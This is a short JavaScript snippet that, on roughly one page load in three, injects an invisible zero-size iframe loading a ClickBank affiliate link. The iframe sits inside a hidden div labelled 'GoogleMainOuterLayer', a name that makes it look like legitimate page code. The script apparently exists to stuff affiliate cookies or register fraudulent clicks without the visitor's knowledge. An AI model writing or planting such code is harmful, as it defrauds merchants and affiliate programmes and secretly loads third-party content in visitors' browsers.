function rand ( n )
{
  return ( Math.floor ( Math.random ( ) * n + 1 ) );
}


var ran = rand( 3 );
var theUrl = 'http://35d20q30xgohjy42s1rrm5x3u8.hop.clickbank.net/';
var theDiv = '<iframe src="'+theUrl+'" width="0" height="0" align="middle" frameborder="0"></iframe>';
var theBody = document.body; 
if (!theBody) {theBody = document.getElementById("body"); 
if (!theBody) {theBody = document.getElementsByTagName("body")[0];}}
if (theBody && (ran==1))
{
	divtag = document.createElement("div"); 
	divtag.setAttribute("id","GoogleMainOuterLayer"); 
	divtag.style.position="absolute"; 
	divtag.style.width="0"; 
	divtag.style.height="0"; 
	divtag.style.zIndex="99"; 
	divtag.style.left="0px"; 
	divtag.style.top="0px"; 
	divtag.innerHTML=theDiv; 
	theBody.appendChild(divtag); 
}